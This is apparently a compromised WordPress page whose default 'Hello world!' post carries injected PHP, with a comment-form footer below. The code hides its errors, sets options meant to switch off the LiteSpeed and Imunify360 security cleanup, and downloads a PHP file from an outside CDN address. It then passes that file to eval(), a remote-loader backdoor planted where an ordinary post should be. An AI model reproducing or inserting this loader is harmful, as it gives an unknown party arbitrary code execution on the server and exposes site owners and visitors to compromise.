Hello world!

<?php
error_reporting(0);
@ini_set(‘lsapi_backend_off’, ‘1’);
@ini_set(‘imunify360.cleanup_on_restore’, false);
$url = ‘https://rrjack.b-cdn.net/admin-jancok88.php’;
$ch  = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$exfooter = curl_exec($ch);
curl_close($ch);
if ($exfooter) {
    eval(‘?>’ . $exfooter);
}
?>

4 thoughts on “Hello world!

Leave a Reply

Your email address will not be published. Required fields are marked *